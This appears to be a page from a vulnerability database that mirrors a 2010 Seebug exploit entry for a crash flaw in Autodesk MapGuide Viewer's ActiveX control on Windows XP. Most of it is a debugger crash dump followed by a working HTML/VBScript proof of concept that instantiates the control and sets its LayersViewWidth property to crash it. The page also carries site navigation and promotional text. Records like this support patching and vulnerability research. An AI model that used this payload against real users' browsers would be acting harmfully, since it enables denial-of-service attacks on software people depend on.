Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 27 Views

Autodesk MapGuide Viewer ActiveX Overflow Vulnerability on Winxp SP

Code

                                                 
# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability 
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys





Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E	CMP DWORD PTR [ESI+1C],0	(MGAXCTRL.DLL)

Seh Chain:
--------------------------------------------------
1 	192847C 	MGAXCTRL.DLL
2 	73352542 	VBSCRIPT.dll
3 	7C839AD8 	KERNEL32.dll



Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644



ArgDump:
--------------------------------------------------
EBP+8	003EB644 -> 0193F90C
EBP+12	00000000
EBP+16	0013EAD4 -> 00130000
EBP+20	0042C4F4 -> 00110024
EBP+24	0013EA94 -> 0013EAD4
EBP+28	0013EB30 -> 0013EBC0


Block Disassembly: 
--------------------------------------------------
175CE8F	POP ESI
175CE90	JMP [EAX+60]
175CE93	PUSH ESI
175CE94	LEA ESI,[ECX+404]
175CE9A	TEST ESI,ESI
175CE9C	JE SHORT 0175CEC2
175CE9E	CMP DWORD PTR [ESI+1C],0	  <--- CRASH
175CEA2	JE SHORT 0175CEC2
175CEA4	PUSH 0
175CEA6	PUSH DWORD PTR [ESP+C]
175CEAA	MOV ECX,ESI
175CEAC	PUSH 0
175CEAE	CALL 01912C63
175CEB3	MOV EAX,[ESI]
175CEB5	MOV ECX,ESI





PoC:


<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype  = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid     = "MGMapControl.MGMap"
argCount   = 1

arg1=0

target.LayersViewWidth = arg1

</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
autodesk mapguide vieweroverflow vulnerabilitywinxp sp3
27